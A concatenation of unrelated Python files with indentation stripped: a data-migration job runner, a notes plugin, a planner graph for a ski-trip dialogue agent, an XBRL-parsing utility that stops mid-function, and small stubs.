my_logger.info("Duration : %s ", duration)
my_logger.info("CPU TIME : %s ", process_time())
my_logger.info("Job ended with status %s", end_status)
if __name__ == '__main__':
my_logger.info('Starting Odin\'s data migration tool version 0.0.1-Alpha')
my_logger.info('Starting with parameters %s', str(sys.argv))
start_time_of_job = get_ts()
jobdata = read_job_config()
result = "FAILED"
my_logger.info("Performing job : %s",jobdata['job_name'])
if jobdata['job_type'] == 'createReference':
result=create_reference(jobdata=jobdata)
elif jobdata['job_type'] == 'transformation':
result= transformation.perform_transformation(jobdata=jobdata)
elif jobdata['job_type'] == 'ftp':
result = filetransfer.transfer(jobdata=jobdata)
else:
my_logger.critical("Unknown job_type found. Please check : %s", jobdata['job_type'])
sys.exit(99)
end_time_of_job = get_ts()
print_job_statistic(start_time_of_job, end_time_of_job, None, result)
if result == "FAILED":
sys.exit(99)
|
""" Lunch Plugin Module
"""
import re
from ashaw_notes.plugins import base_plugin
class Plugin(base_plugin.Plugin):
"""Lunch Plugin Class"""
bypass_today = True
regex = re.compile(r'^((s)?lunch)$')
def is_plugin_note(self, note):
"""Verifies note relates to plugin"""
return bool(self.regex.match(note))
def process_input(self, note):
"""Handle note input"""
return note
def format_note_line(self, timestamp, note_line):
"""Allows enabled plugins to modify note display"""
note_line = Plugin.regex.sub(
"<table style='width:100%;font-weight:bold;background-color:#511;" \
"color:#fff;text-align:center;'>" \
r"<tr><td style='width: 100%;'>\1 break</td></tr></table>",
note_line)
return note_line
|
from collections import OrderedDict
psgraph = {
"init": 31,
"goal": 0,
"nodes": {
0: {
"expected_successor": False,
"action": "---",
"state": "0x97918d0",
"distance": 0,
"is_relevant": 1,
"is_goal": 1,
"is_sc": 1,
"successors": [
],
},
1: {
"expected_successor": "0",
"action": "system-book_trip ",
"state": "0x97b3c58",
"distance": 1,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
0,
],
},
5: {
"expected_successor": "1",
"action": "dialogue-followup warn-no_weather",
"state": "0x97bbe18",
"distance": 2,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
1,
],
},
9: {
"expected_successor": "16",
"action": "dialogue-ask_location src",
"state": "0x97ec978",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
18,
],
},
10: {
"expected_successor": "9",
"action": "dialogue-ask_location dst",
"state": "0x97eca48",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
9,
19,
],
},
11: {
"expected_successor": "13",
"action": "dialogue-ask-to-change err-bad_weather",
"state": "0x97ed2d0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
16,
20,
9,
26,
24,
21,
10,
],
},
12: {
"expected_successor": "1",
"action": "web-lookup_weather dst",
"state": "0x97ed4f0",
"distance": 2,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
1,
11,
5,
],
},
13: {
"expected_successor": "12",
"action": "web-lookup_travel ",
"state": "0x97ed5f0",
"distance": 3,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
12,
28,
],
},
17: {
"expected_successor": "16",
"action": "dialogue-followup err-bad_dates",
"state": "0x9815848",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
],
},
18: {
"expected_successor": "9",
"action": "dialogue-followup err-bad_location",
"state": "0x9849508",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
9,
],
},
16: {
"expected_successor": "13",
"action": "dialogue-ask_dates dates",
"state": "0x97ba6c0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
17,
],
},
19: {
"expected_successor": "10",
"action": "dialogue-followup err-bad_location",
"state": "0x98331e8",
"distance": 7,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
10,
],
},
21: {
"expected_successor": "20",
"action": "dialogue-ask_location dst",
"state": "0x986de20",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
20,
23,
],
},
20: {
"expected_successor": "13",
"action": "dialogue-ask_location src",
"state": "0x985f840",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
22,
],
},
22: {
"expected_successor": "20",
"action": "dialogue-followup err-bad_location",
"state": "0x9875418",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
20,
],
},
23: {
"expected_successor": "21",
"action": "dialogue-followup err-bad_location",
"state": "0x9875518",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
21,
],
},
24: {
"expected_successor": "16",
"action": "dialogue-ask_location dst",
"state": "0x98aaa30",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
25,
],
},
25: {
"expected_successor": "24",
"action": "dialogue-followup err-bad_location",
"state": "0x989e8a0",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
24,
],
},
26: {
"expected_successor": "13",
"action": "dialogue-ask_location dst",
"state": "0x98c5ef0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
27,
],
},
27: {
"expected_successor": "26",
"action": "dialogue-followup err-bad_location",
"state": "0x98d8508",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
26,
],
},
28: {
"expected_successor": "13",
"action": "dialogue-ask-to-change err-bad_dates_for_travel",
"state": "0x98ea6c0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
16,
20,
9,
26,
24,
21,
10,
],
},
29: {
"expected_successor": "16",
"action": "dialogue-confirm_location src",
"state": "0x98fc758",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
9,
32,
18,
],
},
30: {
"expected_successor": "29",
"action": "dialogue-ask_location dst",
"state": "0x98fc678",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
29,
33,
],
},
31: {
"expected_successor": "13",
"action": "system-assess_initial_data ",
"state": "0x98fd160",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
16,
21,
10,
26,
24,
34,
29,
35,
30,
20,
9,
],
},
32: {
"expected_successor": "16",
"action": "dialogue-followup msg-affirm",
"state": "0x990b128",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
],
},
33: {
"expected_successor": "30",
"action": "dialogue-followup err-bad_location",
"state": "0x9904f70",
"distance": 7,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
30,
],
},
34: {
"expected_successor": "13",
"action": "dialogue-confirm_location src",
"state": "0x99117d0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
20,
36,
22,
],
},
35: {
"expected_successor": "34",
"action": "dialogue-ask_location dst",
"state": "0x9905388",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
34,
37,
],
},
36: {
"expected_successor": "13",
"action": "dialogue-followup msg-affirm",
"state": "0x9911db0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
],
},
37: {
"expected_successor": "35",
"action": "dialogue-followup err-bad_location",
"state": "0x99168c0",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
35,
],
},
},
"edges": [
[1, ">", 0],
[5, ">", 1],
[9, ">", 16],
[9, ">", 18],
[10, ">", 9],
[10, ">", 19],
[11, ">", 13],
[11, ">", 16],
[11, ">", 20],
[11, ">", 9],
[11, ">", 26],
[11, ">", 24],
[11, ">", 21],
[11, ">", 10],
[12, ">", 1],
[12, ">", 11],
[12, ">", 5],
[13, ">", 12],
[13, ">", 28],
[17, ">", 16],
[18, ">", 9],
[16, ">", 13],
[16, ">", 17],
[19, ">", 10],
[21, ">", 20],
[21, ">", 23],
[20, ">", 13],
[20, ">", 22],
[22, ">", 20],
[23, ">", 21],
[24, ">", 16],
[24, ">", 25],
[25, ">", 24],
[26, ">", 13],
[26, ">", 27],
[27, ">", 26],
[28, ">", 13],
[28, ">", 16],
[28, ">", 20],
[28, ">", 9],
[28, ">", 26],
[28, ">", 24],
[28, ">", 21],
[28, ">", 10],
[29, ">", 16],
[29, ">", 9],
[29, ">", 32],
[29, ">", 18],
[30, ">", 29],
[30, ">", 33],
[31, ">", 13],
[31, ">", 16],
[31, ">", 21],
[31, ">", 10],
[31, ">", 26],
[31, ">", 24],
[31, ">", 34],
[31, ">", 29],
[31, ">", 35],
[31, ">", 30],
[31, ">", 20],
[31, ">", 9],
[32, ">", 16],
[33, ">", 30],
[34, ">", 13],
[34, ">", 20],
[34, ">", 36],
[34, ">", 22],
[35, ">", 34],
[35, ">", 37],
[36, ">", 13],
[37, ">", 35],
],
"states": {
"0x97918d0": [
"Atom intent-handled-book_ski_trip()",
],
"0x97b3c58": [
"NegatedAtom forced-followup(system)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom ok-travel()",
"Atom ok-weather(dst)",
],
"0x97bbe18": [
"NegatedAtom forced-followup(system)",
"Atom followup-reason(warn-no_weather)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom ok-travel()",
"Atom ok-weather(dst)",
],
"0x97ec978": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x97eca48": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x97ed2d0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(err-bad_weather)",
"NegatedAtom forced-followup(dialogue)",
"Atom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
],
"0x97ed4f0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"Atom ok-travel()",
],
"0x97ed5f0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9815848": [
"NegatedAtom forced-followup(system)",
"Atom followup-reason(err-bad_dates)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9849508": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x97ba6c0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98331e8": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x986de20": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x985f840": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9875418": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9875518": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98aaa30": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x989e8a0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98c5ef0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98d8508": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98ea6c0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(err-bad_dates_for_travel)",
"NegatedAtom forced-followup(dialogue)",
"Atom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
],
"0x98fc758": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98fc678": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98fd160": [
"Atom forced-followup(system)",
"Atom followup-reason(need-assess_initial_data)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(src)",
"NegatedAtom ok-travel()",
],
"0x990b128": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(msg-affirm)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9904f70": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x99117d0": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9905388": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9911db0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(msg-affirm)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x99168c0": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
},
}
action_mapping = {
"---": "GOAL ACHIEVED",
"system-book_trip ": "(system) <book-trip>",
"dialogue-followup warn-no_weather": "(dial) Hovor: It looks like the weather can't be found at the moment. Proceeding anyways.",
"dialogue-ask_location src": "(dial) Hovor: Where will you be traveling from?",
"dialogue-ask_location dst": "(dial) Hovor: Where do you want to go to?",
"dialogue-ask-to-change err-bad_weather": "(dial) Hovor: The weather will be bad. Is there any part of the trip you'd like to change?",
"web-lookup_weather dst": "(web) <lookup-weather for dst>",
"web-lookup_travel ": "(web) <lookup-travel-dates>",
"dialogue-ask_dates dates": "(dial) Hovor: What dates would you like to travel?",
"dialogue-followup err-bad_dates": "(dial) Hovor: Sorry, but I can't recognize what those dates are.",
"dialogue-followup err-bad_location": "(dial) Hovor: That doesn't seem to be a valid location.",
"dialogue-ask-to-change err-bad_dates_for_travel": "(dial) Hovor: Sorry, but those dates aren't good for the travel you're hoping for. Is there any part of the trip you'd like to change?",
"dialogue-confirm_location src": "(dial) Hovor: Is it <src> that you will be traveling from?",
"system-assess_initial_data ": "(dial) Hovor: Hello, what ski trip would you like?",
"dialogue-followup msg-affirm": "(dial) Hovor: Got it!"
}
intent_info_mapping = {
"system-assess_initial_data ": OrderedDict([
("intent1", "<init-setting-1>"),
("intent2", "<init-setting-2>"),
("intent3", "<init-setting-3>"),
("intent4", "<init-setting-4>"),
("intent5", "<init-setting-5>"),
("intent6", "<init-setting-6>"),
("intent7", "<init-setting-7>"),
("intent8", "<init-setting-8>"),
("intent9", "<init-setting-9>"),
("intent10", "<init-setting-10>"),
("intent11", "<init-setting-11>"),
("intent12", "<init-setting-12>"),
]),
"dialogue-ask_dates dates": OrderedDict([
("intent1", "<good response> Ernesto: From Feb 21 - 27"),
("intent2", "<bad response> Ernesto: My spoon is too big!"),
]),
"dialogue-followup err-bad_location": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-confirm_location src": OrderedDict([
("intent1", "<positive response> Ernesto: Yep!"),
("intent2", "<negative response> Ernesto: No way!"),
("intent3", "<negative plus info> Ernesto: No, it will be New York."),
("intent4", "<bad response> Ernesto: I like butterflies."),
]),
"dialogue-followup warn-no_weather": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-followup err-bad_dates": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-ask-to-change err-bad_weather": OrderedDict([
("intent1", "<change-setting-1> Ernesto: No"),
("intent2", "<change-setting-2> Ernesto: Yes"),
("intent3", "<change-setting-3>"),
("intent4", "<change-setting-4>"),
("intent5", "<change-setting-5>"),
("intent6", "<change-setting-6>"),
("intent7", "<change-setting-7>"),
("intent8", "<change-setting-8>"),
]),
"web-lookup_weather dst": OrderedDict([
("intent1", "<good weather>"),
("intent2", "<bad weather>"),
("intent3", "<service down>"),
]),
"dialogue-ask_location src": OrderedDict([
("intent1", "<good response> Ernesto: I'll be flying from Boston."),
("intent2", "<bad response> Ernesto: Purple is a fun colour."),
]),
"dialogue-ask_location dst": OrderedDict([
("intent1", "<good response> Ernesto: I want to go to Whistler."),
("intent2", "<bad response> Ernesto: Where is my hat?"),
]),
"dialogue-ask-to-change err-bad_dates_for_travel": OrderedDict([
("intent1", "<change-setting-1>"),
("intent2", "<change-setting-2> Ernesto: Yes"),
("intent3", "<change-setting-3>"),
("intent4", "<change-setting-4> Ernesto: No"),
("intent5", "<change-setting-5>"),
("intent6", "<change-setting-6>"),
("intent7", "<change-setting-7>"),
("intent8", "<change-setting-8>"),
]),
"web-lookup_travel ": OrderedDict([
("intent1", "<good travel>"),
("intent2", "<bad dates for travel>"),
]),
"system-book_trip ": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-followup msg-affirm": OrderedDict([
("intent1", "<single outcome>"),
]),
}
context_entity_info_mapping = {
"system-assess_initial_data ": [
"I will travel from $src to $dst on $dates",
"skiing in $dst",
"skiing at $dst",
"I want ski from $dates-from to $dates-to"
"I will travel from $src to $dst.",
"I will fly from $src.",
"I will fly to $dst.",
"I would like to go skiing between $dates",
],
}
def get_scope(name):
if '---' == name:
return 'system'
return name.split('-')[0]
def get_domain():
return {
"types": {
"location": "sys-location",
"travel_dates": "sys-date_range"
},
"entities": {
"dst": "location",
"src": "location",
"dates": "travel_dates"
},
"entity_configs": {
"dst":{},
"src": {},
"dates": {},
}
}
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 01_01_Download_SEC_Data.ipynb (unless otherwise specified).
__all__ = []
|
import pandas as pd
a = pd.read_csv('../data/annotationdetclsconvfnl_v3.csv')
path = 'F:\\医学数据集\\LUNA\\rowfile\\subset5'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 30 09:40:44 2018
@author: niels-peter
"""
__title__ = 'xbrl_ai'
__version__ = '0.0.4'
__author__ = 'Niels-Peter Rønmos'
from xml.etree.ElementTree import fromstring
from xmljson import badgerfish as bf
import collections
def xbrlinstance_to_dict(xbrlinstance):
"""
Transforming XBRL-instant to python dictionary
"""
# From XBRL to dict
xbrldict = bf.data(fromstring(xbrlinstance))['{http://www.xbrl.org/2003/instance}xbrl']
# Extract unit information
unitlist = {}
unit = xbrldict['{http://www.xbrl.org/2003/instance}unit']
if isinstance(unit, list):
for post in unit:
try:
unitlist[post['@id']] = (post['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
try:
divide = post['{http://www.xbrl.org/2003/instance}divide']
unitlist[post['@id']] = ((divide['{http://www.xbrl.org/2003/instance}unitNumerator'])['{http://www.xbrl.org/2003/instance}measure'])['$'] + '/'\
+ ((divide['{http://www.xbrl.org/2003/instance}unitDenominator'])['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
elif isinstance(unit, dict):
try:
unitlist[unit['@id']] = (unit['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
try:
divide = unit['{http://www.xbrl.org/2003/instance}divide']
unitlist[unit['@id']] = ((divide['{http://www.xbrl.org/2003/instance}unitNumerator'])['{http://www.xbrl.org/2003/instance}measure'])['$'] + '/'\
+ ((divide['{http://www.xbrl.org/2003/instance}unitDenominator'])['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
# Extract context information
contexts = xbrldict['{http://www.xbrl.org/2003/instance}context']
contextlist = {}
for post in contexts:
identifier = scheme = startdate = enddate\
= instant = explicit = typed = None
entity = post['{http://www.xbrl.org/2003/instance}entity']
for element in entity:
try:
identifier = (entity[element])['$']
scheme = (entity[element])['@scheme']
except LookupError:
pass
try:
explicit = (entity['{http://www.xbrl.org/2003/instance}segment'])\
['{http://xbrl.org/2006/xbrldi}explicitMember']
except LookupError:
pass
try:
typed = (entity['{http://www.xbrl.org/2003/instance}segment'])\
['{http://xbrl.org/2006/xbrldi}typedMember']
except LookupError:
pass
period = post['{http://www.xbrl.org/2003/instance}period']
try:
startdate\
= (period['{http://www.xbrl.org/2003/instance}startDate'])['$']
except LookupError:
startdate = None
try:
enddate\
= (period['{http://www.xbrl.org/2003/instance}endDate'])['$']
except LookupError:
enddate = None
try:
instant\
= (period['{http://www.xbrl.org/2003/instance}instant'])['$']
except LookupError:
instant = None
try:
explicit = (post['{http://www.xbrl.org/2003/instance}scenario'])\
['{http://xbrl.org/2006/xbrldi}explicitMember']
except LookupError:
pass
try:
typed = (post['{http://www.xbrl.org/2003/instance}scenario'])\
['{http://xbrl.org/2006/xbrldi}typedMember']
except LookupError:
pass
contextlist[post['@id']] = [identifier,\
scheme, startdate, enddate, instant, explicit, typed]
for opryd in ('{http://www.xbrl.org/2003/instance}context',
'{http://www.xbrl.org/2003/instance}unit'):
del xbrldict[opryd]
def modificer_xbrl(xbrldict1):
xbrldict2 = {}
modified = False
for concept in xbrldict1:
if isinstance(xbrldict1[concept], list):
for i in range(0, len(xbrldict1[concept])):
for u in xbrldict1[concept][i]:
type_list = type(xbrldict1[concept][i][u]).__name__
break
if type_list not in ('OrderedDict', 'list'):
xbrldict2[concept] = xbrldict1[concept]
elif type_list in ('OrderedDict', 'list'):
for u in xbrldict1[concept][i]:
modified = True
xbrldict2[u] = xbrldict1[concept][i][u]
else:
pass
elif isinstance(xbrldict1[concept], dict):
for i in xbrldict1[concept].keys():
type_in_dict = type(xbrldict1[concept][i]).__name__
break
if type_in_dict not in ('OrderedDict', 'list'):
xbrldict2[concept] = xbrldict1[concept]
elif type_in_dict == 'list':
for u in xbrldict1[concept]:
modified = True
xbrldict2[u] = xbrldict1[concept][u]
elif type_in_dict == 'OrderedDict':
for u in xbrldict1[concept].keys():
modified = True
xbrldict2[u] = xbrldict1[concept][u]
else:
pass
else:
xbrldict2[concept] = xbrldict1[concept]
return xbrldict2, modified
andret = True
while andret == True:
xbrldict, andret = modificer_xbrl(xbrldict)
# Add unit and context infdromation on concepts
for concept in xbrldict:
if isinstance(xbrldict[concept], dict):
try:
(xbrldict[concept])['context']\
= contextlist[(xbrldict[concept])['@contextRef']]
except LookupError:
pass
try:
(xbrldict[concept])['unit']\
= unitlist[(xbrldict[concept])['@unitRef']]
except LookupError:
pass
if isinstance(xbrldict[concept], list):
for i in range(0, len(xbrldict[concept])):
try:
((xbrldict[concept])[i])['context']\
= contextlist[((xbrldict[concept])[i])['@contextRef']]
except LookupError:
pass
try:
((xbrldict[concept])[i])['unit']\
= unitlist[((xbrldict[concept])[i])['@unitRef']]
except LookupError:
pass
return xbrldict
def xbrldict_to_xbrl_54(xbrldict):
def get_xbrlkey(post, char):
return post[post.index(char)+1:]
def explicit_list(explicit):
explicit_liste = {}
dimension_list = []
label_extend = ''
if type(explicit).__name__ == 'OrderedDict':
explicit_liste[get_xbrlkey(explicit['@dimension'], ":")]\
= get_xbrlkey(explicit['$'], ":")
if isinstance(explicit, list):
for element in explicit:
explicit_liste[get_xbrlkey(element['@dimension'], ":")]\
= get_xbrlkey(element['$'], ":")
explicit_liste_od = collections.OrderedDict(sorted(explicit_liste.items()))
for keys in explicit_liste_od:
label_extend = label_extend + '_' + explicit_liste_od[keys]
dimension_list.append(keys)
return label_extend, dimension_list
def typed_list(typed):
typed_liste = {}
dimension_list = []
label_typed = label_typed_id = ''
if type(typed).__name__ == 'OrderedDict':
for poster in typed:
if poster == '@dimension':
dimension = get_xbrlkey(typed['@dimension'], ":")
if poster != '@dimension':
vaerdi = (typed[poster]).get('$', None)
member = get_xbrlkey(poster, "}")
typed_liste[dimension, vaerdi] = member
if type(typed).__name__ == 'list':
for element in typed:
for poster in element:
if poster == '@dimension':
dimension = get_xbrlkey(element['@dimension'], ":")
if poster != '@dimension':
vaerdi = (element[poster]).get('$', None)
member = get_xbrlkey(poster, "}")
typed_liste[dimension, vaerdi] = member
typed_liste_od = collections.OrderedDict(sorted(typed_liste.items()))
for keys in typed_liste_od:
dimension_list.append(keys[0])
label_typed = label_typed + '_' + typed_liste_od[keys]
if label_typed_id == '':
label_typed_id = str(keys[1])
else:
label_typed_id = label_typed_id + '|' + str(keys[1])
return label_typed, label_typed_id, dimension_list
def concept_data(inputdata):
value = inputdata.get('$', None)
unit = inputdata.get('unit', None)
decimals = inputdata.get('@decimals', None)
context = inputdata['context']
lang = inputdata.get('@{http://www.w3.org/XML/1998/namespace}lang', None)
if type(lang).__name__ != 'NoneType':
lang = 'lang:' + lang
startdate = context[2]
enddate = context[3]
instant = context[4]
if type(enddate).__name__ != 'str':
enddate = instant
explicit = context[5]
